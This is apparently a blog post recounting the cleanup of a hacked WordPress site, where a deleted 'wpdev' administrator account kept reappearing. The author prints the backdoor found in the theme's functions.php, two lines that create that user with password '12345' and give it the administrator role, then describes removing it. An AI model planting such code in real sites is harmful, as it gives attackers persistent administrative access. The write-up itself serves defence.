I recently wrote an article on how I recovered my client’s website from Black Hat SEO spam attack. During the process, I observed a strange behavior – even after deleting an user account called ‘wpdev‘, which belonged to an ex-developer of the company, the account appeared again in Users > All Users page (In fact, WordPress confirmed account deletion). What was more scary is, the account gets created with new user ID (incrementally) & assigned to ‘administrator’ role. I kept deleting the account, but WordPress kept creating the same and every time with new user ID. Something is wrong, so I tried changing the role to “– No role for this site –” and the account stayed in that role until deletion.
However, I was able to delete other user accounts without any problem. So what’s happening with this particular account? It does seem to be a malicious code which looks for ‘wpdev‘ user account and if doesn’t exist, it creates one. How scary is that? Fortunately, I was able to fix the issue.
Solution:
I tried searching online to see if someone has encountered a similar issue, but couldn’t find any. But this link hinted that the user account might be created programmatically! So I took a backup of the infected WordPress files and started searching for a file that calls wp_create_user function (its a function to create user accounts programmatically). The result was shocking, the functions.php in theme folder was using wp_create_user function. Ah! What is it doing out there?
Have a look at the code below.
$user = new WP_User(wp_create_user('wpdev', '12345', 'wpdev@dummy.com'));
$user->set_role('administrator');The above code was creating ‘wpdev‘ user account with password ‘12345‘ and sets role as ‘administrator’. Now you know it, this code was keep on creating a new user account when it does not exist (the code does not check for account existence, but creates one blindly. Anyway, if account exists, WordPress will not create one), allowing the hacker to login to WordPress anytime with password ‘12345’.
I removed the code and deleted the user account successfully.
Well, the issue is solved, but what keeps me worrying is, how did the hacker gain an access to WordPress admin? I still couldn’t crack that mystery, but all I can do is to secure the WordPress using this guide – an Ultimate guide to WordPress security & Optimization.
Securing WordPress is not an one time job, it’s a on-going process and never has an end.
